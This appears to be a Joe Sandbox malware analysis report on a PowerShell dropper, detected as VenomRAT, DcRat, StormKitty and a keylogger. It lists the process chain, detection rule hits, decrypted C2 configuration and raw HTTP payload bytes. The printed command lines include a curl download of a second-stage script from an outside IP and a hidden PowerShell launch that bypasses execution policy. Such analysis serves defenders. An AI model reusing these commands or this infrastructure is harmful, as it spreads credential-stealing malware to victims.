Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sfqbr.ps1

Overview

General Information

Sample name:sfqbr.ps1
Analysis ID:1585139
MD5:524fca1eea0f55f1ad6281325664dcb4
SHA1:fa39a3bb823909c0294804a32303378ac25e0492
SHA256:b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff
Tags:ps1user-zhuzhu0009
Infos:

Detection

DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected BrowserPasswordDump
Yara detected DcRat
Yara detected Keylogger Generic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected StormKitty Stealer
Yara detected Strela Stealer
Yara detected VenomRAT
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powerup Write Hijack DLL
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 4980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sfqbr.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5748 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6260 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 6684 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • powershell.exe (PID: 4016 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 4340 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 3212 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES617A.tmp" "c:\Users\user\AppData\Local\Temp\nfy3200k\CSCAAE263D2780F40D49B69A6171B4A2D61.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • RegAsm.exe (PID: 4508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, 404KeyLogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
No configs have been found
SourceRuleDescriptionAuthorStrings
sfqbr.ps1JoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
    • 0x2c8b2b:$a1: havecamera
    • 0x31b166:$a2: timeout 3 > NUL
    • 0x31e96d:$a3: START "" "
    • 0x31eec8:$a3: START "" "
    • 0x31eda3:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
    • 0x31ee40:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
    dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x31a94a:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }}
    • 0x316568:$s6: VirtualBox
    • 0x328a3d:$s6: VirtualBox
    • 0x323438:$s8: Win32_ComputerSystem
    • 0x3289a3:$s8: Win32_ComputerSystem
    • 0x31f846:$s9: Win32_Process Where ParentProcessID=
    • 0x31f3d1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x31f615:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x31f6fd:$cnc4: POST / HTTP/1.1
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.4582340011.0000000003204000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DcRat_2Yara detected DcRatJoe Security
      00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VenomRATYara detected VenomRATJoe Security
        00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BrowserPasswordDump_1Yara detected BrowserPasswordDumpJoe Security
            00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_Generic_3Yara detected Keylogger GenericJoe Security
              Click to see the 41 entries
              SourceRuleDescriptionAuthorStrings
              5.2.powershell.exe.29dddb68eb8.5.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
              • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
              • 0x5e4:$x3: StormKitty
              5.2.powershell.exe.29ddc0bc858.2.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
              • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
              • 0x5e4:$x3: StormKitty
              5.2.powershell.exe.29dddb632e0.3.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
              • 0x61a0:$x2: https://github.com/LimerBoy/StormKitty
              • 0x61bc:$x3: StormKitty
              5.2.powershell.exe.29ddc077076.0.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
              • 0x45daa:$x2: https://github.com/LimerBoy/StormKitty
              • 0x45dc6:$x3: StormKitty
              5.2.powershell.exe.29ddc07a518.7.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
              • 0x42908:$x2: https://github.com/LimerBoy/StormKitty
              • 0x42924:$x3: StormKitty
              Click to see the 115 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_4980.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                amsi64_4016.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                  System Summary

                  barindex
                  Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4980, TargetFilename: C:\Windows\Temp\Pack.bat
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sfqbr.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sfqbr.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sfqbr.ps1", ProcessId: 4980, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4016, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline", ProcessId: 4340, ProcessName: csc.exe
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4980, TargetFilename: C:\Windows\Temp\Pack.bat
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1 , CommandLine: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1 , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5748, ParentProcessName: cmd.exe, ProcessCommandLine: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1 , ProcessId: 6260, ProcessName: cmd.exe
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4016, TargetFilename: C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sfqbr.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sfqbr.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sfqbr.ps1", ProcessId: 4980, ProcessName: powershell.exe

                  Data Obfuscation

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4980, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.url
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4016, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline", ProcessId: 4340, ProcessName: csc.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-07T06:12:10.576354+010028424781Malware Command and Control Activity Detected94.130.22.614449192.168.2.649742TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Source: C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.dllJoe Sandbox ML: detected
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: 4449
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: 94.130.22.61
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: RAT + hVNC 6.0.5
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: false
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: qorykprjfvdyllcofpt
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: MIICLjCCAZegAwIBAgIVAIvioiAg1c1FOm/rKAIe2b5Q1/eBMA0GCSqGSIb3DQEBDQUAMGIxFTATBgNVBAMMDFZlbm9tIFNlcnZlcjESMBAGA1UECwwJYWxleGVpa3VuMRswGQYDVQQKDBJWZW5vbSBCeSBhbGV4ZWlrdW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDAzMjAxNjM4MTFaFw0zNDEyMjgxNjM4MTFaMBAxDjAMBgNVBAMMBVZlbm9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDIHPUmH5BwLX+omkWqhkwVe1CyqH0RZ8xEJI8WrTJCZV7Ey62MfHKW4JP565ZkbDcabeaiq0a/761cKKhTU5e8hFN2Nm7lEOA0J5R6vnKYgMbbPGZ5y5FiPnl9N5c7bSc2Yhtw7vwLOPkf+9R7ZC0vfYUkJeK1m3U7WKLEhXqKrwIDAQABozIwMDAdBgNVHQ4EFgQU7Plcp5CYAHAROFxivpKC+f0ImwIwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQC/dQ95DGSZgcf5vi8Rj0qrw2XTMO6G+qPSxbi6eBSnsg2Nt+gd2yJxj7JeuNwWd0B7xL9s9xf1441iu7DepDKCGz4CXPiwmgc1rbV3i5+1T9ZGcc0SuJy6u4lv3xuKWo4Zo/NRH49iwkwvBX8BkusG+52T7bOhhV/gpPXsh/Xyiw==
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: px+7e5VWuq6/O7qudAQ5o06M55eiJae9J4gKWHSumP3QWjFwNhdbPvFqE5mB05JZjK+FWRsyjNmnEZBmVxXwT/NGBAvIYRlNjecKISOAfZ3cMCortAd2Ijqn+83P+FKSgiV9US1ND30Ux6UdBgLEZv4g/6kDjs/LsARozFc5tHQ=
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: null
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: false
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: false
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: Default
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: false
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpackString decryptor: false
                  Source: Binary string: Automation.pdb source: powershell.exe, 00000005.00000002.2351616241.0000029DF4150000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: :C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.pdb source: powershell.exe, 00000005.00000002.2255186878.0000029DDDAB6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: :C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.pdbhP source: powershell.exe, 00000005.00000002.2255186878.0000029DDDAB6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\SYSTEM32\rasman.dll.pdb source: powershell.exe, 00000005.00000002.2349927128.0000029DF3D9E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: AL_MACHINE\SOFTWARE\Microsoft\.NETFramework.pdb source: powershell.exe, 00000005.00000002.2349927128.0000029DF3D9E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb? source: powershell.exe, 00000005.00000002.2349927128.0000029DF3DFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Managem..Automation.pdb source: powershell.exe, 00000005.00000002.2351616241.0000029DF4150000.00000004.00000020.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\System32\curl.exe

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 94.130.22.61:4449 -> 192.168.2.6:49742
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.6:49742 -> 94.130.22.61:4449
                  Source: global trafficTCP traffic: 192.168.2.6:52490 -> 162.159.36.2:53
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 07 Jan 2025 05:12:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 06 Jan 2025 15:14:03 GMTETag: "8a00-62b0b14360f58"Accept-Ranges: bytesContent-Length: 35328Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 71 e2 4e b4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 86 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9f 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 18 9f 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 7f 00 00 00 20 00 00 00 80 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 a0 00 00 00 06 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 9f 00 00 00 00 00 00 48 00 00 00 02 00 05 00 b8 21 00 00 60 7d 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 48 00 00 00 01 00 00 11 28 0f 00 00 0a 03 6f 10 00 00 0a 0a 02 8e 69 8d 15 00 00 01 0b 16 0c 16 0d 2b 25 07 09 02 09 91 06 08 91 61 09 20 00 01 00 00 5d 61 d2 9c 08 07 09 91 06 8e 69 5d 58 06 8e 69 5d 0c 09 17 58 0d 09 02 8e 69 32 d5 07 2a 13 30 02 00 19 00 00 00 02 00 00 11 02 28 11 00 00 0a 03 28 01 00 00 06 0a 28 0f 00 00 0a 06 6f 12 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 03 00 00 11 72 01 00 00 70 0a 73 14 00 00 0a 73 15 00 00 0a 0b 07 6f 16 00 00 0a 72 3e 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 17 00 00 0a 26 07 6f 16 00 00 0a 72 60 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 17 00 00 0a 26 07 17 6f 18 00 00 0a 07 17 8d 19 00 00 01 25 16 06 7e 01 00 00 04 28 02 00 00 06 a2 6f 19 00 00 0a 6f 1a 00 00 0a 72 8a 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 1b 00 00 0a 72 ac 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 1c 00 00 0a 14 14 6f 1d 00 00 0a 26 2a 1e 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 07 Jan 2025 05:12:04 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 06 Jan 2025 15:11:38 GMTETag: "2fdc00-62b0b0b870bd8"Accept-Ranges: bytesContent-Length: 3136512Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 ee e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 e8 2f 00 53 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 c8 2f 00 00 20 00 00 00 ca 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f7 0d 00 00 00 00 30 00 00 0e 00 00 00 cc 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 30 00 00 02 00 00 00 da 2f 00 00 00 00 00 00 00 00 